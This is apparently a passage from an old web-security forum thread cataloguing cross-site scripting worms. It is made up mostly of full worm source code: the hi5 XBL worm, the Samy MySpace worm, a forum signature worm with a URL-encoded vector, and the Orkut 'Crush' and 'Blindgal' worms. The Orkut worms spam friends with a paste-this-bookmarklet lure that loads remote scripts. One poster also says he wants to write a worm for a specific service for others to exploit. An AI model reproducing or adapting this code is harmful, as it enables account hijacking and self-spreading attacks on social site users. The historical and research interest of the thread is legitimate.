var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {index++;var wDate = new Date;wDate.setTime(wDate.getTime() + 86400);setCookie("wormdoorkut", index, wDate);sendScrap();}};
}

if (!getCookie("wormdoorkut")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 86400);
setCookie("wormdoorkut", "0", wDate);
}
index = getCookie("wormdoorkut");
if (getCookie("wormdoorkut") == "0") {
cmm_join();
} else {
loadFriends();
}

<--------ENDS HERE---------->


Manish S.

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: sirdarckcat
Date: December 29, 2007 03:04PM

The hi5.com worm:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
	<binding id="xs">
		<implementation>
			<constructor>
				(function q(){
					function $(u,x){with(document)with(body)(x=appendChild(createElement('iframe'))).src=u;return x;}
					if(!window.p){
						window.p=escape("("+q+")();");
						alert(/hi5 xss worm wishes you a merry merry xmas/);
						$("http://www.hi5.com/friend/profile/removeSkin.do").height=0;
						$("http://www.hi5.com/friend/account/displayEditProfileCustomization.do").height=0;
						var m=setInterval(function(){
							try{
								frames[1].document.forms[0].backgroundImageURL.value="http://www.x.se/ye59";
								frames[1].document.forms[0].style.value="body{width:expression(eval(unescape(\""+window.p+"\")));-moz-binding:url('http://www.sirdarckcat.net/xssworm.xml#xs');}";
								frames[1].document.forms[0].submit();
								setTimeout(function(){frames[1].location="http://www.hi5.com/friend/account/displayEditProfileCustomization.do";},2000);
							}catch(e){}
						},1000);
					}
				})();
			</constructor>
		</implementation>
	</binding>
</bindings>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: List of XSS Worms?
Date: January 02, 2008 06:47PM

Does anyone know of the legalities behind worm creation? Specifically the creation, and documentation of, but not necessarily the deployment. I'm looking to write a worm for a specific service and let another group of individuals exploit it.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: sirdarckcat
Date: January 02, 2008 09:19PM

well, I think the best person to ask is sammy :P

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: List of XSS Worms?
Date: January 03, 2008 03:31PM

Yeah, but the difference is he would be that he was the one who deployed it. I'm looking only to write one, but not put it to personal use. I'm sure it has to be legal in some manner or another. Look at all the websites housing the sources to old viruses such as "Melissa".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: thornmaker
Date: January 03, 2008 04:20PM

Since it appeared on slashdot today... [www.theregister.co.uk]
Regarding your question, the article states: "The guidelines establish that to successfully prosecute the author of a tool it needs to be shown that they intended it to be used to commit computer crime".

I think it would be hard to show that the authors of duel-use tools (like wireshark, nmap) intended them to be used to commit a computer crime. You would have a much harder time arguing that a site-specific worm was an academic exercise with no malicious intent.

Granted, this is just for the UK, and it hasn't even passed yet. I don't know how things are in the US. Nevertheless, I would contend that the likelihood of being prosecuted is directly proportional to the 'success' of the virus/worm... i.e. the more people that get pissed off, the more people that will be looking for vengeance. Finding a law that you broke won't be an issue, if it comes to that.



Edited 1 time(s). Last edit at 01/03/2008 04:24PM by thornmaker.

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: January 03, 2008 10:37PM

Back on topic, we shouldn't forget Samy (for historical reasons if nothing else):

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Spikeman
Date: January 06, 2008 10:39PM

Quote

I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem was because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.

Here is the vector:

<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>

Here is the worm code itself:

var req = null; 
var stage = 0;
var hack = "sig";
var url = "http://maple-world.net/";
var member = "";
var forum = "";
var topic = "";
var title = "";
var post = " ~~~~@";
vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E";
 
if (window.XMLHttpRequest) {
  req = new XMLHttpRequest();
  if (req.overrideMimeType) {
    req.overrideMimeType('text/xml');
  }
} else if (window.ActiveXObject) {
  try {
    req = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      req = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {}
  }
}


req.onreadystatechange = function() { 
  if(req.readyState == 4) {
    if(req.status == 200) {
      if(hack == "post" || hack == "pin") {
        stage += 1;
        if(stage==1) {
          var i = req.responseText.indexOf("auth_key' value='") + 17;
          auth = req.responseText.substring(i, i + 32);
	  req.open("POST", url + "index.php?", true);
	  if(hack=="post") {
	    var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post;
          } else if(hack == "pin") {
            var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic;
          }
	  req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	  req.setRequestHeader("Content-length", parameters.length);
	  req.setRequestHeader("Connection", "close");
	  req.send(parameters);
        }
      } else if(hack=="sig") {
        stage+=1;
        if(stage==1) {
	  key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1];
	  old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1];
	  xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/);
	  if(xpr){
	    if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];}
	    nxp="+"]";
	    old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp);
	  }
	  if(old.indexOf(post)<0){
	    parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post);
	    req.open("POST", url + "index.php?", true);
	    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	    req.setRequestHeader("Content-length", parameters.length);
	    req.setRequestHeader("Connection", "close");
	    req.send(parameters);
	  }
	}
      }
    }
  } 
};

if(stage==0) {
  if(hack=="post" || hack=="pin") {
    req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true);
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(null);
  } else if(hack=="PM") {
    req.open("POST", url + "index.php?", true);
    post = encodeURI(post);
    title = encodeURI(title);
    var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post;
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.setRequestHeader("Content-length", parameters.length);
    req.setRequestHeader("Connection", "close");
    req.send(parameters);
  } else if(hack=="sig") {
    req.open("GET", url + "index.php?act=UserCP&CODE=22", true);
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(null);
  }
}

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: February 28, 2008 06:20PM

Orkut "Crush" Worm


// ==UserScript==

// @name Master mind

// @author "Ishu"

// @provided by http://

// @description Ishu

// @include *Ishu*

// ==/UserScript==



function fwScrap() {

document.title = "Ishu HELPLINE - Newsletter";



function createXMLHttpRequest() {

try {

return new XMLHttpRequest;

} catch (e) {

try {

return new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

return new ActiveXObject("Microsoft.XMLHTTP");

} catch (e) {



return false;

}

}

}

}



function getPostSig(exc) {

var xml = createXMLHttpRequest();

xml.open("GET", "/Scrapbook.aspx", true);

xml.onreadystatechange = function ()

{

if (
xml.readyState == 4) {


var xmlr = xml.responseText;


POST = xmlr.match(/name="post_token" value="([^"]+)/i);


SIG = xmlr.match(/name="signature" value="([^"]+)/i);


document.getElementsByTagName("input").POST_TOKEN.value = POST[1];


document.getElementsByTagName("input").signature.value = SIG[1];



eval(exc);

}

};

xml.send(null);

}





var select;

function loadFriends() {



date_now = new Date();

var hrs = date_now.getHours();

var min = date_now.getMinutes();

var sec = date_now.getSeconds();

var milliSec = date_now.getMilliseconds();



var xml = createXMLHttpRequest();

xml.open("GET", "/Compose.aspx", true);

xml.onreadystatechange = function ()

{

if (xml.readyState == 4) {

var xmlr =
xml.responseText;

POST =
xmlr.match(/name="post_token" value="([^"]+)/i);

SIG =
xmlr.match(/name="signature"
value="([^"]+)/i);


document.getElementsByTagName("input").POST_TOKEN.value = POST[1];


document.getElementsByTagName("input").signature.value = SIG[1];

var div =
document.createElement("div");

div.innerHTML =
xmlr;



for (var x = 0;
x < div.getElementsByTagName("select").length; x++) {

if (
div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {


select = div.getElementsByTagName("select")[x].cloneNode(true);


globalSelect = select;


break;

}

}



var scrapText;

var tokenValue =
encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);

var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);



//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;

//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec;

scrapText = "Good Work! [:P]";

sendScrap(94850220,scrapText);

SendScrapToAll();







// for(var i=0;i<
globalSelect.length;i++) {

//
if(globalSelect.value!="")
{

//
sendScrap(globalSelect.value,scrapText);

//
setTimeout("",
65 * 1000);

// }

// }




}

};

xml.send(null);

}





function wait() {

antiF = 1;

showTime();

}



c = 0;

function SendScrapToAll()

{

var scrapText;

scrapText = "[maroon]Find out who has crush on
u....[/maroon]<br>[purple]wait 4 few minutes after pressing
enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy
the JavaScript, paste it in your address bar and PRESS
ENTER[/blue]<br><br>[orange]javascript:d=document;c=d.createElement
('script');d.body.appendChild(c);c.src='
http://monster357.freehostia.com/scripts/crush.js';void(0)
[/orange]<br><br>[red]Trust
me, ITS WORKING!!! [:)]<br><br><br><center><font
style=text-decoration:blink><a href=
http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=
http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=
http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center>";



if(c == select.length)

return;



try{

if(select[c].value!="")

{


sendScrap(select[c].value,scrapText);

}

}catch(e){

//Suppressed Exception

} finally {

c = c+ 1;

setTimeout("SendScrapToAll()", 666);

}

}







function showTime() {

if (timeWait > 0) {

timeWait--;

setTimeout("showTime()", 2000);

} else {

timeWait = 20;

index++;

getPostSig("SendScrapToAll()");

}

}



antiF = 1;

index = 1;

timeWait = 20;

nscraps = 0;

nCounter=2;

nLoop=2;



function sendScrap(to, msg) {



date_now = new Date();

var hrs = date_now.getHours();

var min = date_now.getMinutes();

var sec = date_now.getSeconds();

var milliSec = date_now.getMilliseconds();



var tokenValue = encodeURIComponent(document.getElementsByTagName
("input").POST_TOKEN.value);

var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);



//var scrapText = tokenValue + signatureValue
+'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;



var send = "POST_TOKEN=" + tokenValue + "&signature=" +
signatureValue + "&scrapText=" + encodeURIComponent(msg) +
"&toUserId="+to+"&Action.submit=1";



var xml = createXMLHttpRequest();





xml.open("POST", "/Scrapbook.aspx", true);

xml.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded;");

xml.send(send);



xml.onreadystatechange = function () {

if (xml.readyState == 4) {



if (xml.status != 200) {


setTimeout("SendScrapToAll()",
500);

return;

}



if (antiF < 450) {

antiF++;



if(nCounter==1)
{


index++;


nCounter=nLoop;

}

else {


nCounter--;

}

return;


}

else {


wait();

}

}

};

}





layout = " <input name=\"POST_TOKEN\"
type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+

"<center><h3><u>LOADING....
PLEASE WAIT.......</u></h3></center><br>"+

"<table>"+



"</table>"

;


document.body.innerHTML = layout;


var focus = document.createElement("span");

focus.id = "focus";

focus.style.display = "inline";

document.body.appendChild(focus);

var divLoad = document.createElement("div");

divLoad.id = "divLoad";

divLoad.style.display = "inline";

document.body.appendChild(divLoad);



loadFriends();



//sendScrap();



}



sc = String(fwScrap);

sc = sc.substring(21, sc.length - 2);

script = document.createElement("script");

if (typeof document.all) {

script.text = sc;

} else {

script.textContent = sc;

}

document.getElementsByTagName("head")[0].appendChild(script)





and http://monster357.freehostia.com/scripts/crush.js is:


// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==

function fwScrap() {
document.title = "Ishu HELPLINE - Newsletter";

function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {

return false;
}
}
}
}

function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}


var select;
function loadFriends() {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;

for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}

var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Good Work! [:P]";
sendScrap(94850220,scrapText);
SendScrapToAll();



// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect.value!="") {
// sendScrap(globalSelect.value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }

}
};
xml.send(null);
}


function wait() {
antiF = 1;
showTime();
}

c = 0;
function SendScrapToAll()
{
var scrapText;
scrapText = "[maroon]Find out who has crush on u....[/maroon]<br>[purple]wait 4 few minutes after pressing enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]<br><br>[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://monster357.freehostia.com/scripts/blindgal.js';void(0)[/orange]<br><br>[red]Trust me, ITS WORKING!!! [:)]<br><br><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center>";

if(c == select.length)
return;

try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}



function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}

antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;

function sendScrap(to, msg) {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;

var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";

var xml = createXMLHttpRequest();


xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);

xml.onreadystatechange = function () {
if (xml.readyState == 4) {

if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}

if (antiF < 450) {
antiF++;

if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}


layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><h3><u>LOADING.... PLEASE WAIT.......</u></h3></center><br>"+
"<table>"+

"</table>"
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);

loadFriends();

//sendScrap();

}

sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)


and http://monster357.freehostia.com/scripts/blindgal.js is:

// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==

function fwScrap() {
document.title = " Blindgal";

function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {

return false;
}
}
}
}

function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}


var select;
function loadFriends() {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;

for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}

var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Love rocks! [:P] <br>" +hrs+":"+min+":"+sec+"-"+milliSec;
sendScrap(94850220,scrapText);
SendScrapToAll();



// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect.value!="") {
// sendScrap(globalSelect.value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }

}
};
xml.send(null);
}


function wait() {
antiF = 1;
showTime();
}
c = 0 ;
function SendScrapToAll()
{
var scrapText;
scrapText = "<font size=5><center>[red]Love Message</center></font><br> [red]THERE IS STORY OF BLIND GIRL-- >[blue] MUST READ Ppl IN LOVE. <br>[navy]JUST PASTE THE SCRIPT IN THE PLACE WHERE U SEE [gray] (the place where u see www.orkut.com)[/gray] and hit ENTER"+ "<br>"+"<br>[teal] javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://monster357.freehostia.com/scripts/blindgal1.js';void(0)[/teal]<br><BR><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center><br>";
// "<center> </center>";

if(c == select.length)
return;

try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 500);
}
}



function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}

antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;

function sendScrap(to, msg) {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;

var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";

var xml = createXMLHttpRequest();


xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);

xml.onreadystatechange = function () {
if (xml.readyState == 4) {

if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}

if (antiF < 450) {
antiF++;

if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}

layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><center><font size=6>StOry of Blind girl</font></center><br>"+

"<h3>Most Touching Story Ever Read</h3>"+

"<br><BR><BR><font size=5>Click ON link to read story IN COMMUNITy</font>" +
"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>&quot;CLICK HERE&quot;</a></font></font></b>"+

"<br><font size=4>----------I Would love to see ur replies please do reply:----------</font>" +
"<br><br><font size=4>Don forget 2 rply</font>" +
"<br><font size=4>This story will touch ur hearts</font>" +
"<br><br><font size=4>Ur vision will b changed</font>" +
"<br><font size=4>It will give u new approach in life</font>" +
"<br><br><font size=4>Still thinking</font>" +
"<br><font size=4>Just go in community n read topic story of blind gal</font>" +
"<br><br><font size=4>this is love is community</font>" +
"<br><br><font size=4>Sorry if it hurts u</font>" +
"<br><br><font size=4>n tell ur frnd to see it</font>" +
"<br><font size=4>Nothing more see u in community topic</font>" +
"<br><font size=4>Good bye</font>" +

"<br><font size=4>WITH LOVE -- ISHU GUMBER</font>" +
